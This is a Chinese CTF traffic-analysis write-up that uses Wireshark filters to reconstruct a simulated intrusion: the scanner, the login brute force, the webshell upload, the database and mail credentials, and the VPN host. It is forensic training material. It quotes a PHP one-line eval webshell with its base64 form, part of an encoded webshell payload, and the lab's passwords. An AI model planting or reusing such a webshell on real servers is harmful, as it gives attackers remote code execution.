comprehensive traffic analysis

题目

2019.8 安恒流量分析

  1. 某公司内网网络被黑客渗透,请分析流量,给出黑客使用的扫描器
  2. 某公司内网网络被黑客渗透,请分析流量,得到黑客扫描到的登陆后台是(相对路径即可)
  3. 某公司内网网络被黑客渗透,请分析流量,得到黑客使用了什么账号密码登陆了web后台(形式:username/password)
  4. 某公司内网网络被黑客渗透,请分析流量,得到黑客上传的webshell文件名是,内容是什么,提交webshell内容的base编码
  5. 某公司内网网络被黑客渗透,请分析流量,黑客在robots.txt中找到的flag是什么
  6. 某公司内网网络被黑客渗透,请分析流量,黑客找到的数据库密码是多少
  7. 某公司内网网络被黑客渗透,请分析流量,黑客在数据库中找到的hash_code是什么
  8. 某公司内网网络被黑客渗透,请分析流量,黑客破解了账号ijnu@test.com得到的密码是什么
  9. 某公司内网网络被黑客渗透,请分析流量,被黑客攻击的web服务器,网卡配置是是什么,提交网卡内网ip
  10. 某公司内网网络被黑客渗透,请分析流量,黑客使用了什么账号登陆了mail系统(形式: username/password)
  11. 某公司内网网络被黑客渗透,请分析流量,黑客获得的vpn的ip是少

题目分析

1.观察12281号包,看HTTP层的referrer,发现了AWVS的扫描器特征。

2.过滤http协议,发现/admin/login.php

3.过滤http协议,看86号包,发现了表单数据 username 人事 password hr123456(错误答案)

302跳转代表登陆成功

使用http contains “rec=login” and http.request.method==POST and ip.src==192.168.94.59 语句对webone进行过滤,将结果对时间进行排序,发现最后一个包中的username admin password admin!@#pass123

4.a.php 翻到最后发现了a.php 然后分组列表搜a.php 找POST包

Form item: “action” = “QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7aWYoJEQ9PSIiKSREPWRpcm5hbWUoJF9TRVJWRVJb

使用 http contains “<?php @eval” 过滤找一句话木马,但是没找到。

考虑TCP 重传可能导致http没追踪到,所以考虑使用tcp contains “<?php @eval”

发现了

1
<?php @eval($_POST[1234]);?>

将其base64encode即可。

1
PD9waHAgQGV2YWwoJF9QT1NUWzEyMzRdKTs/Pg==

5.搜字符串robots.txt 发现flag flag:87b7cb79481f317bde90c116cf36084b

6.找到webshell的名称后,一直跟踪webshell,看看她在做什么。数据包大概在734581。

后面会发现查看了数据库配置文件,就发现了数据库账号密码 dbuser web dbpass e667jUPvJjXHvEUv

7.在web2数据包中 过滤mysql协议 分组字节流搜索字符串hash_code 看response包发现hash_code d1c029893df40cb0f47bcf8f1c3c17ac

8.web2数据包中 过滤mysql协议 搜索字符串 ijnu@test.com ,看到md5加密的密码b78f5aa6e1606f07def6e839121a22ec,解密一下得到edc123!@#

9.追踪webshell包,发现了ifconfig命令。

->|eth0 Link encap:Ethernet HWaddr 00:0C:29:CB:9F:85 \n

​ inet addr:192.168.32.189 Bcast:192.168.32.255 Mask:255.255.255.0\n

10.打开mailtwo数据包,过滤http流,发现第一个数据包里面的动作是登出,发现了用户名wenwenni。

然后看28号数据包的操作是访问登录页面,35号数据包发现了密码加密函数。

是AES-CBC加密,key为1234567812345678。

继续看42 44数据包,还是wenwenni用户登录,并且返回了 success true.

尝试使用如下过滤器过滤:

1
(http contains "{\"success\":true}" or http.request.method=="POST") and ip.addr==192.168.94.59

发现到最后也没爆破成功(这题看的别人的思路,我没懂)

然后打开mailto1 继续使用上述语句过滤

发现18512登陆成功,则密码在17126号数据包中。+ZgE14UGcFcyRGLI0/ZXPQ==

密码为1234567812345678的MD5值,偏移量为1234567812345678

AES解密得admin!@#PASS123

11.第一个vpn数据包在尝试登录vpn,然后看第二个。

统计一下会话信息,发现10.3.4.3 10.3.4.96 10.3.4.55 这几个ip之间的通信较多,然后过滤看看。

过滤一下smb协议,发现10.3.4.96是SMB服务器。

然后在看一下55这个ip

ip.addr==10.3.4.55

发现10.3.4.3首先ping了10.3.4.55 所以确定10.3.4.3是黑客使用的vpn服务器。

总结

对一些有手就行的过滤方法用的还可以,但是深入一点就不太行了 对一些流量动作的分析不太到位,对filter的用法也不太熟悉,比如\表转义。继续学习!

待学习:PPTP协议、SMB协议

参考

https://blog.csdn.net/qq_43431158/article/details/107176918